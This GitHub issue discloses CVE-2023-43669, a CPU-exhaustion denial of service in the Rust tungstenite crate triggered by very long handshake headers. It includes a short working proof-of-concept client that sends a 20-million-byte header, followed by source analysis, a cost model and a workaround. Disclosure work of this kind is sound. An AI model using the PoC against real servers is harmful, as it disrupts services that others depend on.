CVE-2023-43669: denial of service with long HTTP request header · Issue #376 · snapview/tungstenite-rs
The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes).
I work on an application that depends on tungstenite and is intended to offer server-side ws:// support to untrusted clients over the public Internet. There are hundreds of instances of the server application operated independently by our community members, and it’s not feasible to have other devices (e.g., web application firewalls) protect them. We want to avoid situations where a small number of malicious HTTP requests can devour server CPU resources.
I’m seeing that a single HTTP request (i.e., before the “upgrade: websocket” happens) with any long header can cause request processing to take several minutes or more. For example, testing on a low-cost Ubuntu 23.04 VPS as the server, if the header is 20 million characters, there’s more than 99% CPU consumption for five minutes. Multiple people have reproduced similar results on various Linux systems with tungstenite 0.20.0.
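For reference, here is a minimal sketch of the kind of request we tested with (the address is hypothetical, and this is the variant that sends only My-Long-Header without the websocket upgrade headers):

```rust
use std::io::Write;
use std::net::TcpStream;
use std::time::Duration;

fn main() -> std::io::Result<()> {
    // Hypothetical address; point this at the tungstenite-based server.
    let mut stream = TcpStream::connect("127.0.0.1:8080")?;
    stream.write_all(b"GET / HTTP/1.1\r\nHost: example\r\nMy-Long-Header: ")?;
    // 20 million filler bytes in a single header value.
    stream.write_all(&vec![b'a'; 20_000_000])?;
    stream.write_all(b"\r\n\r\n")?;
    // Hold the connection open while the server parses and re-parses.
    std::thread::sleep(Duration::from_secs(600));
    Ok(())
}
```

The time is spent in this tungstenite source code: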
```rust
pub fn single_round<Obj: TryParse>(mut self) -> Result<RoundResult<Obj, Stream>> {
    trace!("Doing handshake round.");
    match self.state {
        HandshakeState::Reading(mut buf) => {
            let read = buf.read_from(&mut self.stream).no_block()?;
            match read {
                Some(0) => Err(Error::Protocol(ProtocolError::HandshakeIncomplete)),
                Some(_) => Ok(if let Some((size, obj)) = Obj::try_parse(Buf::chunk(&buf))? {
                    buf.advance(size);
                    RoundResult::StageFinished(StageResult::DoneReading {
                        result: obj,
                        stream: self.stream,
                        tail: buf.into_vec(),
                    })
                } else {
                    // No complete request yet: keep everything read so far
                    // and re-parse the entire buffer on the next round.
                    RoundResult::Incomplete(HandshakeMachine {
                        state: HandshakeState::Reading(buf),
                        ..self
                    })
                }),
                // ...
```
I’m seeing more than 4000 calls each to single_round, try_parse, and RoundResult::Incomplete. Looking at buf.len() here:
```rust
fn try_parse(buf: &[u8]) -> Result<Option<(usize, Self)>> {
    let mut hbuffer = [httparse::EMPTY_HEADER; MAX_HEADERS];
    // httparse re-scans buf from the beginning on every call.
    // ...
```
I see a value between 100 and 200 on the first call, and the observed value gradually increases until it gets to 20 million after more than 4000 calls, five minutes later. At that point, a client that sent all the required headers gets an “HTTP/1.1 101 Switching Protocols” response with connection, upgrade, and sec-websocket-accept response headers. (If the client didn’t send the required request headers, for example sending only My-Long-Header: followed by 20 million characters, the five minutes of CPU time still happens but of course “Switching Protocols” isn’t allowed by tungstenite.)
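A back-of-envelope model (our own arithmetic, not measured instrumentation) of why this blows up: each round reads one more chunk and then re-parses the entire buffer, so the total parsing work is roughly quadratic in the header length.

```rust
// Rough cost model; the inputs match the numbers observed above.
fn approx_bytes_parsed(header_len: u64, chunk: u64) -> u64 {
    let rounds = header_len / chunk; // ~4000 rounds for 20 MB at ~5 KB reads
    rounds * (header_len / 2)        // average buffer length per parse attempt
}

fn main() {
    // 20 million header bytes at ~5000 bytes per read: 4000 parse
    // attempts averaging 10 MB each, i.e. ~40 GB scanned in total.
    println!("{}", approx_bytes_parsed(20_000_000, 5_000));
}
```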
We’re able to work around this by checking for a large total header size (and dropping the client’s connection) before any of tungstenite’s code is called. However, any other crate that depends on tungstenite could experience the same excessive CPU consumption wherever clients can send long HTTP request headers.
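For illustration, one shape such a workaround can take is a Read/Write wrapper that refuses to deliver more than a fixed number of bytes; the type, its names, and the 64 KiB limit below are ours rather than tungstenite API, and as written the cap keeps applying after the handshake too.

```rust
use std::io::{self, Read, Write};

/// Hypothetical wrapper: stops reading after `cap` bytes, so the handshake
/// buffer (and therefore each re-parse attempt) stays bounded.
struct CappedStream<S> {
    inner: S,
    read_so_far: usize,
    cap: usize, // e.g. 64 * 1024
}

impl<S: Read> Read for CappedStream<S> {
    fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
        if self.read_so_far >= self.cap {
            // Treat an oversized handshake as fatal and drop the client.
            return Err(io::Error::new(io::ErrorKind::InvalidData, "header too large"));
        }
        let n = self.inner.read(buf)?;
        self.read_so_far += n;
        Ok(n)
    }
}

impl<S: Write> Write for CappedStream<S> {
    fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
        self.inner.write(buf)
    }
    fn flush(&mut self) -> io::Result<()> {
        self.inner.flush()
    }
}
```

Passing such a wrapper to tungstenite::accept makes the handshake fail fast instead of re-parsing megabytes of headers.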
The question is: should this issue be resolved within tungstenite, e.g., by rejecting long header lines (maybe in a configurable way) sooner, by avoiding calls to try_parse until a complete header line (ending with \n) is read, or by making some other change?
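To sketch the second idea (an illustration of the approach, not proposed patch code, and a stricter variant that waits for the full header terminator rather than a single line): the reading state could skip try_parse until the bytes that end the header block have actually arrived, scanning only the newly read tail.

```rust
/// Illustrative only: returns true once buf contains the \r\n\r\n that ends
/// an HTTP/1.1 header block. already_scanned lets the caller avoid
/// re-scanning old bytes each round (a 3-byte overlap catches terminators
/// that straddle a read boundary).
fn header_block_complete(buf: &[u8], already_scanned: usize) -> bool {
    let start = already_scanned.saturating_sub(3);
    buf[start..].windows(4).any(|w| w == b"\r\n\r\n")
}
```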
I don’t think the issue can be attributed to the httparse crate: RFC 7230 section 3.2.5 places no predefined limit on header field length, but it explicitly allows a server (which is tungstenite’s role here) to choose and enforce its own upper bound.
Is this a vulnerability in tungstenite, or is tungstenite simply not intended to remain performant when a header has millions of characters?